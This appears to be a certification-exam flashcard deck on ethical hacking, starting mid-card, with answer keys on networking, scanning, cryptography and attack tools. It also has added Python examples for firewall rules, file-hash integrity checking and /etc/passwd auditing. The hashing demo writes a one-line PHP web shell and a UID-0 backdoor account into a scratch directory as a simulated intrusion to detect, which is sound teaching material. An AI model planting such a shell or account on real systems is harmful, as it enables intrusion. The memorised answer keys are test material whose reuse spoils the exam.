The minimum for all records in the zone. If not updated by a zone transfer, the records will perish. The default value is 3,600 seconds (1 hour).
B)False positive
The new NIDS (Network Intrusion Detection System) recently prevented a user from accessing resources remotely to which he should have access. Which type of alert does this represent? A)True negative B)False positive C)True positive D)False negative
C) HTTP tunneling
The penetration team is separated from potential targets by firewall; however a penetration test member discovers port 80 is open. Which of the following techniques is the best choice to attempt sending data and/or commands to a target system behind the firewall? A) MAC flooding B) Session splicing C) HTTP tunneling D) Firewalking
unique number
The second half of the MAC address is a _____ burned in at manufacturing to ensure no two cards on any given subnet will have the same address.
B)Classify and prioritize
The security professionals working for your company have designed the procedures for incident handling and response. Today you received a notification of a virus infection. You successfully analyze the virus infection that has affected only your company's file servers. What is the next step you should complete? A)Contain B)Classify and prioritize C)Notify D)Investigate
Reconnaissance
The steps taken to gather evidence and information on the targets you want to attack.
Netcat
Tool for banner grabbing:
Tenable's Nessus Retina CS Microsoft Baseline Security Analyzer (MBSA) GFI LanGuard Qualys FreeScan OpenVAS
Vulnerability scanners:
LanWhoIs HotWhois Batch IP Converter ActiveWhois CallerIP WhoisThisDomain Whois Lookup Multiple Addresses SoftFuse Whois WhoIs Analyzer Pro Whois Domain Dossier Whois BetterWhois DNSstuff Whois Online Network Solutions Whois Web Wiz WebToolHub Network-Tools.com UltraTools
WHOIS Lookup Tools
Regional Internet Registries personal information of domain owners
WHOIS databases are maintained by ____ and contain the _____.
Domain name details Contact details of domain owner Domain name servers NetRange When a domain has been created Expiry records Records last updated
WHOIS query returns:
WebSite-Watcher VisualPing Follow That Page Versionista WatchThatPage OnWebChange
Web Updates Monitoring Tools
download a website to a local directory
Web mirroring tools allow you to ___, building recursively all directories, HTML, images, flash, videos, and other files from the server to your computer
HTTrack (www.httrack.com) Black Widow (http://softbytelabs.com) WebRipper (www.calluna-software.com) Teleport Pro (www.tenmax.com) GNU Wget (www.gnu.org) Backstreet Browser (http://spadixbd.com)
Web site mirroring tools:
B. Layer 4
What OSI layer does SSL operate in? A. Layer 7 B. Layer 4 C. Layer 3 D. Layer 2
Frame
What PDU is at Layer 2 of OSI model
Packet
What PDU is at Layer 3 of OSI model
Segment
What PDU is at Layer 4 of OSI model
RFC 5952
What RFC addresses IPv6 truncation?
Web spiders
What are applications that crawl through a website, reporting information on what they find?
HTTrack Web Site Copier SurfOffline BlackWidow PageNest NCollector Studio Backstreet Browser Website Ripper Copier Offline Explorer Enterprise Teleport Pro GNU Wget Portable Offline Browser Hooeey Webprint
What are some Mirroring tools available with the two most popular first?
Make activity on the Internet untraceable; Allow you to bypass Internet censors
What can anonymizers do?
D)Perform testing through a firewall
What can network vulnerability scanners NOT do? A)Find wired and wireless network vulnerabilities B)Scan for open ports and listening services C)Find operating system and security configuration weaknesses D)Perform testing through a firewall
Service oriented architecture (SOA) vulnerability
What class of vulnerability is an XML denial of service attack?
1) # nc -vv www.juggyboy.com 80 (press ENTER) 2) GET / HTTP/1.0 (press ENTER twice)
What command is used for Banner Grabbing using Netcat?
tshark
What command launches a CLI version of Wireshark?
traceroute tracert
What command line tool can help map a network, and tracks a packet across the Internet and provides the route path and transit times?
nslookup
What command line tool is used to query DNS servers for information?
set query=mx
What command would you use to tell nslookup to find records on e-mail servers?
Cain & Abel
What common tool can be used for launching an ARP poisoning attack?
1) Host is not alive 2) Host might not respond to ICMP
What could a nonresponse to ICMP indicate?
Logs
What could be used to monitor application errors and violations on a web server or application?
Hub
What device will neither limit the flow of traffic nor have an impact on the effectiveness of sniffing?
B) Time exceeded
What does ICMP type 11, code 0, indicate? A) Redirect B) Time exceeded C) Echo Request D) Echo return
Server's public key
What does a client use to encrypt the session key in an SSL connection?
Destination unreachable, because the router has no route to the network on which the destination resides
What does an ICMP Type 3/Code 6 error message indicate?
C)Displays current firewall settings at a high level
What does the command netsh firewall show config do? A)Enables Windows firewall B)Provides an option to add rules to the configuration C)Displays current firewall settings at a high level D)Displays all rules within Windows Firewall
Ports
What does the enumeration phase not discover?
D. It defines the location of the Snort rules.
What does this line from the Snort configuration file indicate? var RULE_PATH c:\etc\snort\rules A. The configuration variable is not in the proper syntax. B. It instructs the Snort engine to write rule violations in this location. C. It instructs the Snort engine to compare packets to the rule set named "rules." D. It defines the location of the Snort rules.
C) AES
What encryption standard does WPA2 use? A) RC4 B) RC5 C) AES D) SHA-1
A)NTFS
What file system is the alternate data streams (ADS) vulnerability designed to exploit? A)NTFS B)VMFS C)FAT D)UFS
C. SYN/ACK
What flag or flags are sent in the segment during the second step of the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK/FIN
Risk mitigation
What happens when a control is implemented to reduce the impact of a risk?
Risk acceptance
What happens when no control is used to address a particular risk?
Asymmetric routing
What is it called when traffic between point A and point B takes one route to get there and another to return?
A vulnerability exposed in the OpenSSL cryptographic library allowing attackers to steal server private keys and user session cookies and passwords.
What is heartbleed?
Buffer overflow
What is it called when a program, while writing data to memory, overruns the memory boundary and overwrites adjacent memory locations?
Tailgating
What is it called when an unauthorized person enters the facility by following an authorized person who has successfully authenticated to the physical access system?
ACK
What is missing from a half-open scan?
Difficult to install
What is not a benefit of hardware keyloggers?
A vulnerability exposed in the Unix Bash shell allowing attackers to execute arbitrary commands.
What is shellshock?
Reused code that still contains vulnerabilities
What is shrinkwrap code?
technology platforms, employee details, login pages, intranet portals
What is some of the information extracted during Footprinting through Search Engines?
Computer emergency response teams (CERTs) are expert groups that handle computer security incidents.
What is the CERT?
0xffffffffffff
What is the Layer 2 Ethernet broadcast address?
C) FF:FF:FF:FF:FF:FF
What is the MAC address in broadcast frames? A) AA:AA:AA:AA:AA:AA B) 11:11:11:11:11:11 C) FF:FF:FF:FF:FF:FF D) 99:99:99:99:99:99
dig @server name type (server = name or IP of the DNS name server; name = name of the resource you're looking for; type = the type of record you want to pull)
What is the basic syntax for using dig?
C)512-bit blocks with an output of 160 bits
What is the block and output size of SHA1? A)1088-bit blocks with an output of 256 bits B)1024-bit blocks with an output of 256 bits C)512-bit blocks with an output of 160 bits D)512-bit blocks with an output of 128 bits
D)191.43.167.255
What is the broadcast address for the subnet 191.43.164.0/22? A)191.43.255.255 B)191.43.164.255 C)191.43.165.255 D)191.43.167.255
protocol.field operator value
What is the generic syntax of a Wireshark filter?
To evade detection by the IDS
What is the goal of session fragmentation and session splicing attacks?
investigating web resources and competitive intelligence, mapping out network ranges, mining WHOIS and DNS, social engineering, e-mail tracking, Google hacking
What is the logical flow that footprinting follows?
End-user training
What is the most efficient protection control against a social engineering attack?
Operating system and version
What is the most valuable information you can gain from a banner grab?
Steganography
What is the term for hiding messages or information within other non-secret text or data?
Key escrow
What is the term for placing copies of private keys used to encrypt data in the safekeeping of a third party organization?
Residual risk
What is the term for risk that still exists after security controls have been applied?
Factorization
What is the term for the decomposition of a value into a product of other values that give the original value when multiplied together?
Redundancy or fault tolerance
What is the term for the implementation of backup systems to prevent loss of access to resources?
D)Factorization
What is the term for the process of determining two numbers that can be multiplied together to equal a given starting value? A)Trapdooring B)Derivation C)Hashing D)Factorization
Vulnerability linkage
What is the term for the process of identifying sets of vulnerabilities that can be used to penetrate a network?
War chalking
What is the term for writing wireless access information on the side of a building?
The opening of a TCP connection
What is the three-way handshake?
To fill the MAC table with nonexistent MAC addresses, causing the switch to flood all frames out all interfaces and allowing the attacker to receive frames he would normally not be allowed to see
What is the ultimate goal of a MAC flood attack?
Cookie
What is used to store session information?
C)Public key
What item is contained in the digital certificate that enables the receiver of the certificate to send an encrypted email to the sender? A)Private key B)Signature C)Public key D)Serial number
Business or functional manager
What job role is in charge of ensuring systems and information assets for a unit are used to accomplish business objectives?
Facilities manager
What job role is in charge of addressing physical risks to the facility?
Get recipient's system IP address; Geolocation of the recipient; When the email was received and read; Whether or not the recipient visited any links sent to them; Get recipient's browser and operating system information; Time spent on reading the emails
What kind of information can be gathered through email tracking?
Network Access
What layer of the TCP/IP model has the following protocols: ARP, L2TP, STP, HDLC, FDDI, Etc.?
Application
What layer of the TCP/IP model has the following protocols: HTTP, FTP, SNMP, SMTP, DNS, POP, IMAP, NNTP, Telnet, SSH, DHCP, etc.
Internet
What layer of the TCP/IP model has the following protocols: IP, ICMP?
Transport
What layer of the TCP/IP model has the following protocols: TCP, UDP?
Encryption
What may be helpful in protecting the content on a web server from being viewed by unauthorized personnel?
C. By manipulating the Time-To-Live (TTL) parameter
What method does traceroute use to map routes traveled by a packet? A. By carrying a hello packet in the payload, forcing the host to respond B. By using DNS queries at each hop C. By manipulating the Time-To-Live (TTL) parameter D. By using ICMP Type 5, Code 0 packets
Promiscuous Mode
What mode must be configured to allow a NIC to capture all traffic on the wire?
netstat -an
What netstat command displays all connections and listening ports, with addresses and port numbers in numerical form?
National Institute of Standards and Technology (NIST)
What organization has as its official mission to promote U.S. innovation and industrial competitiveness?
C) /etc
Where is the password file kept on a Linux machine? A) /dev B) /config C) /etc D) /com
D. Calling the company's help desk line E. Employing passive sniffing
Which of the following activities are not considered passive footprinting? (Choose two.) A. Dumpster diving B. Reviewing financial sites for company information C. Clicking links within the company's public website D. Calling the company's help desk line E. Employing passive sniffing
B)Mitigate C)Accept E)Avoid
Which of the following are acceptable methods for handling risk? (Choose all that apply.) A)Ignore B)Mitigate C)Accept D)Reject E)Avoid
B. Enable DHCP snooping on the switch. D. Configure DHCP filters on the switch.
Which of the following are the best preventive measures to take against DHCP starvation attacks? (Choose two.) A. Block all UDP port 67 and 68 traffic. B. Enable DHCP snooping on the switch. C. Use port security on the switch. D. Configure DHCP filters on the switch.
A) They are used to identify networks C) They can be a maximum of 32 characters
Which of the following are true regarding SSIDs? A) They are used to identify networks B) They are used to encrypt traffic on networks C) They can be a maximum of 32 characters D) They can be a maximum of 16 characters
B) It is used for encryption of passwords on Windows NT machines D) It uses a 128 bit key
Which of the following are true regarding Syskey? (Choose all that apply) A) It is used in encryption of passwords on certain Linux systems B) It is used for encryption of passwords on Windows NT machines C) It uses a 256 bit key D) It uses a 128 bit key
A)Theft of a password by a coworker or remote contractor
Which of the following attacks can NOT be effectively mitigated by file permissions? A)Theft of a password by a coworker or remote contractor B)Posing as the server after a successful authentication to gain access to data C)Intercepting and modifying unsigned SMB packets to gain access to data D)Posing as the client machine after a successful authentication to gain access to data
A. XSS
Which of the following attacks lets you assume a user's identity at a dynamically generated web page? A. XSS B. SQL Injection C. Session Hijacking D. Zone transfer
B)ARP poisoning
Which of the following attacks occurs at the Data Link layer of the OSI model? A)IP address spoofing B)ARP poisoning C)Rogue DHCP server D)Cross-site scripting
A) Using a protocol in a way it was not originally intended to be used
Which of the following best defines "covert channel"? A) Using a protocol in a way it was not originally intended to be used B) An application using a port that is not well known C) A hacker using a browser to look at the company's public website D) A wireless connection
B. Security tokens
Which of the following best defines a logical or technical control? A. Air conditioning B. Security tokens C. Fire alarms D. Security policy
B. Injecting parameters into a connection string using semicolons as separators
Which of the following best describes a connection stream parameter pollution attack? A. Injecting the same name into multiple parameters within an HTTP request B. Injecting parameters into a connection string using semicolons as separators C. Adjusting session identifiers to explicit, known values D. Injecting JavaScript code into multiple input parameters
Directory traversal
Which of the following is used to access content outside the root of a website?
B. An external DNS server is Active Directory integrated.
Which of the following may be a security concern for an organization? A. The internal network uses private IP addresses registered to an Active Directory--integrated DNS server. B. An external DNS server is Active Directory integrated. C. All external name resolution requests are accomplished by an ISP. D. None of the above.
D) All of the above
Which of the following may be used in a fully switched subnet to improve sniffing efforts? A) MAC Flooding B) ARP Spoofing C) Span Ports D) All of the above
IP DHCP Snooping
Which of the following prevents ARP poisoning?
B)SOAP
Which of the following protocols or standards formats information in XML? A)CORBA B)SOAP C)DCOM D)OLE
A) Common Criteria
Which of the following refers to an international standard that provides a set of requirements for evaluation? A) Common Criteria B) ISO 9600 C) DEV 201 Series D) The Blue Book
A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies
Which of the following represents EC-Council's scanning methodology? A) Check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies B) Check for open ports, check for live systems, perform banner grabbing, scan for vulnerabilities, draw network diagrams, and prepare proxies C) Perform banner grabbing, check for live systems, check for open ports, scan for vulnerabilities, draw network diagrams, and prepare proxies D) Draw network diagrams, check for live systems, check for open ports, perform banner grabbing, scan for vulnerabilities, and prepare proxies
D)Sensitive information was obtained from a stolen company laptop
Which of the following scenarios could be prevented by using EFS? A)DDoS attack makes the network inaccessible for four hours B)Thieves breaking into the server room and damaging the servers C)Sensitive data captured with a sniffer during transmission D)Sensitive information was obtained from a stolen company laptop
C)Conducting security assessments on network resources
Which of the following security actions is intended to validate existing systems? A)Recording the steps taken when upgrading network servers. B)Deploying a new configuration to a router C)Conducting security assessments on network resources D)Assigning responsibilities to the technical team
A)Auditing
Which of the following security tools should be examined before implementation to gauge its effects on performance? A)Auditing B)Vulnerability scanner C)Wireless sniffer D)Antivirus software
C) Defense in depth
Which of the following sets up many, varying security controls to protect an organization's IT resources? A) Single sign-on B) Overt channels C) Defense in depth D) Multilayer firewall
A)Network range of protected IP addresses B)Excluded rule files
Which of the following settings can be specified in the Snort configuration file? (Choose all that apply.) A)Network range of protected IP addresses B)Excluded rule files C)XOR encoders for NOPS D)FIN, URG and PUSH flags for TCP headers
C. Technical details and procedures
Which of the following should not be included in a security policy? A. Policy exceptions B. Details on noncompliance disciplinary actions C. Technical details and procedures D. Supporting document references
C) UDP 514
Which of the following standard ports must be opened on the firewall to allow log messages to be sent to a log analysis tool? A) UDP 123 B) TCP 123 C) UDP 514 D) TCP 514
C)Most serious threat the organization faces
Which of the following statements BEST describes disgruntled employees? A)Less of a threat than black hat hackers, but more of a threat than gray hat hackers B)Less of a threat than gray hat hackers, but more of a threat than white hat hackers C)Most serious threat the organization faces D)Pose no threat to the organization
A)They invented RSA encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption
Which of the following statements are FALSE with regard to Whitfield Diffie and Martin Hellman? (Choose all that apply.) A)They invented RSA encryption B)They invented public key encryption C)The system they devised provides compression and restorability D)The algorithm named after them performs encryption
A)It was replaced by the program ipchains C)It controls the packet filter or firewall capabilities
Which of the following statements are true of the program ipfwadm? (Choose all that apply.) A)It was replaced by the program ipchains B)It is a program written for Windows C)It controls the packet filter or firewall capabilities D)It has additional code that filters for fragmented packets
C)It is a form of mutual authentication.
Which of the following statements is NOT true about RSA SecurID? A)It uses a password only once. B)It is a form of two-factor authentication. C)It is a form of mutual authentication. D)Passwords stolen through a phishing attack will fail.
D. Port scanning is used to identify potential vulnerabilities on a target system.
Which of the following statements is true regarding port scanning? A. Port scanning's primary goal is to identify live targets on a network. B. Port scanning is designed to overload the ports on a target in order to identify which are open and which are closed. C. Port scanning is designed as a method to view all traffic to and from a system. D. Port scanning is used to identify potential vulnerabilities on a target system.
C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step.
Which of the following statements is true regarding the TCP three-way handshake? A. The recipient sets the initial sequence number in the second step. B. The sender sets the initial sequence number in the third step. C. When accepting the communications request, the recipient responds with an acknowledgement and a randomly generated sequence number in the second step. D. When accepting the communications request, the recipient responds with an acknowledgment and a randomly generated sequence number in the third step.
D)Security policies are technology specific.
Which of the following statements regarding security policies is NOT true? A)Security policies reduce legal liability to third parties. B)Security policies protect companies from threats. C)Security policies protect confidential and proprietary information. D)Security policies are technology specific.
B)Take ownership of a file
Which of the following tasks cannot be performed using cacls.exe, but is supported by xcacls.exe? A)Display permissions to a file B)Take ownership of a file C)Modify an ACL D)Assign permissions to a folder
D)John the Ripper
Which of the following technical assessment tools is used to test passwords for weakness? A)Tripwire B)Snort C)Nmap D)John the Ripper
A)Prone to man-in-the-middle attacks E)Maps 48-bit addresses to 32-bit addresses
Which statements are true of ARP? (Choose two.) A)Prone to man-in-the-middle attacks B)Maps 48-bit addresses to host names C)Resistant to man-in-the-middle attacks D)Maps 32-bit addresses to host names E)Maps 48-bit addresses to 32-bit addresses
The last step involves returning systems to the state they were in before the pen test, which can include removing or cleaning up user accounts and files created as a result of the test (Clearing Tracks)
Which step in a penetration test is sometimes called "cleaning up"?
Disgruntled employees
Which threat agent poses the biggest threat to the disclosure of sensitive data?
C)Disclosure of sensitive data
Which threat poses the highest impact to the organization by a disgruntled employee? A)Introduction of stress into the work environment B)Negative effect on morale C)Disclosure of sensitive data D)Low productivity
XCACLS.exe
Which tool can take ownership of a file from the Windows command line?
fragroute
Which tool is used to intercept, modify, and rewrite egress traffic destined for the specified host in such a way that a NIDS cannot recognize the attack signatures?
D)WirelessMon E)Vistumbler F)NetStumbler
Which tool(s) are used to discover a nearby Wi-Fi network or device? (Choose all that apply.) A)Skyhook B)AirPcap C)Wireshark D)WirelessMon E)Vistumbler F)NetStumbler
B)Botnet zombies
Which trait differentiates a DoS attack from a DDoS attack? A)Injected code B)Botnet zombies C)Spoofed IP address D)SYN flood
Point-to-Point Tunneling Protocol (PPTP)
Which tunneling protocol operates at the Data Link layer and uses Microsoft Point-to-Point Encryption (MPPE) to protect the connection?
A)Provide third party access to data B)Facilitate recovery operations
Which two of the following are goals of key escrow agreements? A)Provide third party access to data B)Facilitate recovery operations C)Enhance the security of public keys D)Enhance the security of private keys
B. TCP 53
You are told to monitor a packet capture for any attempted DNS zone transfer. Which port should you focus your search on? A. TCP 22 B. TCP 53 C. UDP 22 D. UDP 53
D)Deploy the smart cards to control building access and the biometrics to control data center access.
You must design physical security for a new building your company is building. You need to select the appropriate physical control for the building itself, for the network wiring closets, and for the data center located in the building. You have been given the funds to implement smart cards and biometrics. You need to keep the cost of these systems as low as possible. Where should you deploy these systems? A)Deploy the biometrics to control building access and the smart cards to control data center access. B)Deploy the biometrics to control building access and the smart cards to control wiring closet access. C)Deploy the smart cards to control building access and the biometrics to control wiring closet access. D)Deploy the smart cards to control building access and the biometrics to control data center access.
B)Bluebugging D)SMiShing F)Jailbreaking/rooting
You must determine the possible vulnerabilities that could be exploited on your company's mobile devices. Which of the following attacks are ONLY targeted at mobile platforms? (Choose all that apply.) A)Drive-by downloading B)Bluebugging C)Man-in-the-middle D)SMiShing E)Clickjacking F)Jailbreaking/rooting
A)Validate all inputs C)Protect data D)Implement appropriate access controls F)Implement error and exception handling G)Encode data
You must work with application designers to ensure that a new Web application adheres to OWASP's Top 10 Proactive Controls. Which of the following are part of this? (Choose all that apply.) A)Validate all inputs B)Implement detailed error messaging C)Protect data D)Implement appropriate access controls E)Disclose data F)Implement error and exception handling G)Encode data
A)x86/opty2
You need to create a NOP slide using the Metasploit Framework. Which module should you use? A)x86/opty2 B)0xf3af1000 C)x86/xor D)0xd503201f
A)PGP
You need to deploy an asymmetric encryption mechanism that will sign, encrypt, and decrypt emails to increase the security of e-mail communications. Which encryption mechanism should you implement? A)PGP B)IPSec C)3DES D)SHA1
D)Netstumbler
You need to detect 802.11b wireless networks in the area. Which product should you use? A)AirSnort B)Retina C)Network Mapper D)Netstumbler
C)Fragmenting the attack payload
You need to determine how attackers can evade an intrusion detection system (IDS). Which of the following best describes session splicing? A)Spoofing the attack source B)Encoding the attack payload C)Fragmenting the attack payload D)Disabling the attack target
B)Router ACL
You need to ensure that malicious packets are prevented from entering your private network. Packets should be evaluated based on the following criteria: -Source IP addresses -Protocol and port number Which type of security tool will use only these criteria to deny access? A)NTFS permissions B)Router ACL C)NIPS D)NIDS
B. Closed
You receive a RST-ACK from a port during a SYN scan. What is the state of the port? A. Open B. Closed C. Filtered D. Unknown
Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops
You run the following command: nmap -p21,80,443 -sV -O 45.33.32.156 What is the most likely partial output? A) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https B) Host is up (0.029s latency). Not shown: 992 closed ports PORT STATE SERVICE 22/tcp open ssh 25/tcp filtered smtp 80/tcp open http 135/tcp filtered msrpc 443/tcp filtered https C) Host is up (0.029s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 443/tcp filtered https Device type: general purpose|firewall|router|broadband router|WAP|terminal Running: Linux 3.X|2.6.X|2.4.X Network Distance: 12 hops D) Host is up (0.029s latency). PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http 443/tcp filtered https
D. sc query state=all
You want to display active and inactive services on a Window Server machine. Which of the following commands best performs this service? A. sc query B. sc query type=all C. sc query type=service D. sc query state=all
A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range.
Your company implements a demilitarized zone (DMZ) to isolate publicly available servers. The security engineer implements the following rule on the firewall that protects and isolates the DMZ: Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389 What does this rule do? A)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. B)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with the device with an address of 192.168.2.0. C)It will allow the internal computer with an address of 10.1.1.12 to use SNMP to communicate with all the devices that use IP addresses in the 192.168.2.0 - 192.168.2.255 range. D)It will allow the internal computer with an address of 10.1.1.12 to use RDP to communicate with the device with an address of 192.168.2.0.
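As an added example (not part of the deck), a first-match evaluator for rules written the way the card above writes them. It consults only source, destination, protocol and destination port, which is all a router ACL sees; payload and session state never enter the decision. The rule grammar it parses (ACTION SRC DST PROTO[/PROTO] [Port N], a bare address meaning /32, "any" meaning all, "IP" meaning any protocol) is an assumption for this example.

```python
# Added example (not from the original deck): a first-match packet-filter
# evaluator for rules written the way the card writes them. It consults only
# source, destination, protocol and destination port, which is exactly what a
# router ACL sees; nothing about payload or session state is examined.
import ipaddress
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple

ANY_V4 = ipaddress.ip_network("0.0.0.0/0")


@dataclass(frozen=True)
class Rule:
    action: str                 # "permit" or "deny"
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    protos: FrozenSet[str]      # e.g. {"tcp", "udp"}; {"ip"} means any protocol
    dport: Optional[int]        # None means any destination port


def _network(token: str) -> ipaddress.IPv4Network:
    """'any' -> 0.0.0.0/0; a bare address -> /32; 'a.b.c.d/n' as written."""
    if token.lower() == "any":
        return ANY_V4
    return ipaddress.ip_network(token, strict=False)


def parse_rule(text: str) -> Rule:
    """Parse 'Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389'.
    Grammar (an assumption for this example): ACTION SRC DST PROTO[/PROTO] [Port N]."""
    parts = text.split()
    if len(parts) < 4:
        raise ValueError(f"malformed rule: {text!r}")
    action = parts[0].lower()
    if action not in ("permit", "deny"):
        raise ValueError(f"unknown action {parts[0]!r}")
    protos = frozenset(p.lower() for p in parts[3].split("/"))
    dport = None
    if len(parts) >= 6 and parts[4].lower() == "port":
        dport = int(parts[5])
    return Rule(action, _network(parts[1]), _network(parts[2]), protos, dport)


def evaluate(rules: List[Rule], src: str, dst: str, proto: str,
             dport: int) -> Tuple[str, Optional[int]]:
    """Return (action, index of the matching rule). First match wins; a packet
    that matches nothing hits the implicit deny at the end of the list."""
    s, d, p = ipaddress.ip_address(src), ipaddress.ip_address(dst), proto.lower()
    for idx, r in enumerate(rules):
        if (s in r.src and d in r.dst
                and (p in r.protos or "ip" in r.protos)
                and (r.dport is None or r.dport == dport)):
            return r.action, idx
    return "deny", None


# The rule from the card, as the only explicit entry before the implicit deny.
DMZ_RULES = [parse_rule("Permit 10.1.1.12 192.168.2.0/24 TCP/UDP Port 3389")]

if __name__ == "__main__":
    for pkt in [("10.1.1.12", "192.168.2.77", "tcp", 3389),
                ("10.1.1.13", "192.168.2.77", "tcp", 3389),
                ("10.1.1.12", "192.168.2.77", "udp", 161)]:
        print(pkt, "->", evaluate(DMZ_RULES, *pkt))
```

Only the 10.1.1.12 host reaches the DMZ /24 on 3389; any other source, any other destination network, or any other port falls through to the implicit deny, and nothing in the rule distinguishes a legitimate RDP session from malicious traffic on that port.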
B)Identify if computer files have been changed
Your company regularly uses MD5 hashing on their file server. What is the purpose? A)Capture all communication with the file server B)Identify if computer files have been changed C)Detect any intrusions on the file server D)Prevent any intrusions on the file server
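As an added example (not part of the deck), the integrity check the card describes: hash every file under a directory, keep the digests as a baseline, and later report what was modified, added or removed. The algorithm is a parameter because the card's use case is MD5, but MD5 is collision-broken, so SHA-256 is the default here. The tampering scenario and file contents are constructed for the example.

```python
# Added example (not from the original deck): build a hash baseline for a
# directory tree and report what changed. The card's use case is MD5, so the
# algorithm is a parameter, but MD5 is collision-broken; SHA-256 is the
# default here for new baselines.
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple


def digest_of(data: bytes, algorithm: str = "sha256") -> str:
    """Hex digest of an in-memory byte string."""
    return hashlib.new(algorithm, data).hexdigest()


def hash_file(path: str, algorithm: str = "sha256", chunk: int = 65536) -> str:
    """Hash a file in chunks so large files do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root: str, algorithm: str = "sha256") -> Dict[str, str]:
    """Map every regular file under root (path relative to root, '/'-separated)
    to its digest. Store this record off-box: a baseline kept on the server
    can be rewritten by whoever tampered with the files."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = hash_file(full, algorithm)
    return baseline


def compare(old: Dict[str, str], new: Dict[str, str]) -> Tuple[List[str], List[str], List[str]]:
    """Return (modified, added, removed) paths, each sorted."""
    modified = sorted(p for p in old if p in new and old[p] != new[p])
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    return modified, added, removed


def _write(root: str, rel: str, text: str, append: bool = False) -> None:
    with open(os.path.join(root, *rel.split("/")), "a" if append else "w") as fh:
        fh.write(text)


def demo() -> Tuple[List[str], List[str], List[str]]:
    """Constructed scenario: baseline a scratch tree, tamper with it, diff.
    The paths and contents are made up for the example."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "etc"))
        _write(root, "etc/passwd", "root:x:0:0:root:/root:/bin/bash\n")
        _write(root, "app.conf", "debug=false\n")
        _write(root, "old.log", "nothing to see\n")
        baseline = build_baseline(root)

        # Simulated intrusion: a UID-0 account appended, a web shell dropped,
        # a log removed to cover tracks.
        _write(root, "etc/passwd", "eve:x:0:0::/:/bin/sh\n", append=True)
        _write(root, "shell.php", "<?php system($_GET['c']); ?>\n")
        os.remove(os.path.join(root, "old.log"))
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    modified, added, removed = demo()
    print("modified:", modified, "added:", added, "removed:", removed)
```

The check answers only "did this file change", not "who changed it" or "is it malicious"; pairing it with a baseline stored off-box and a log of expected changes (patches, config pushes) is what turns the diff into an alert.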
802.11n
can run upward of 150 Mbps
OpManager
is a network monitoring software that offers advanced fault and performance management functionality across critical IT resources such as routers, WAN links, switches, firewalls, VoIP call paths, physical servers, etc.
Simple Service Discovery Protocol (SSDP)
is a network protocol that works in conjunction with UPnP to detect plug and play devices available in a network
Spam Mimic
is a spam/email steganography tool that encodes a secret message into an innocent-looking spam email
Shoulder Surfing
is a technique in which attackers secretly observe the target, for example by watching a keyboard or screen, to gain critical information such as passwords or PINs
FOCA (Fingerprinting Organizations with Collected Archives)
is a tool used mainly to find metadata and hidden information in the documents it scans
Social engineering
is the art of exploiting human behaviour to extract confidential information
XMAS
is so named because the probe's flags are "lit up like a Christmas tree"; Nmap's Xmas scan sets FIN, PSH and URG, although some descriptions say all flags are turned on.
ethical hacker
is someone who employs the same tools and techniques a criminal might use, with the customer's full support and approval, to help secure a network or system.
phreaker
is someone who manipulates telecommunication systems in order to make free calls.
PsList
lists detailed information about running processes (Sysinternals)
basically just runs a reverse DNS lookup on every IP address in the range, without sending any probe to the hosts themselves.
list scan
cyberterrorist
motivated by religious or political beliefs to create fear and large-scale system disruption
Web spiders
perform automated searches on the target website and collect specified information such as employee names, email addresses, etc.
Angry IP Scanner
pings each IP address to check if it's alive, then optionally resolves its hostname, determines the MAC address, scans ports, etc
Registered ports
port numbers 1024 - 49,151
/etc/passwd
where can the UID (User ID) and GID (Group ID) be found on a Linux machine?
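As an added example (not part of the deck), a parser for /etc/passwd records together with the checks an assessor runs on them: look up a user's UID and GID, and flag any account other than root that has UID 0, since an extra UID-0 user is a classic backdoor. The sample records are constructed for the example.

```python
# Added example (not from the original deck): parse /etc/passwd records and run
# the checks an assessor does on them. The sample records are constructed.
from typing import Dict, List, NamedTuple, Optional


class PasswdEntry(NamedTuple):
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Fields: name:password:UID:GID:GECOS:home:shell. The password field is
    'x' on modern systems because the hash lives in /etc/shadow."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, int(uid), int(gid), gecos, home, shell))
    return entries


def ids_for(entries: List[PasswdEntry], name: str) -> Optional[Dict[str, int]]:
    """UID and GID of the named account, or None if it does not exist."""
    for e in entries:
        if e.name == name:
            return {"uid": e.uid, "gid": e.gid}
    return None


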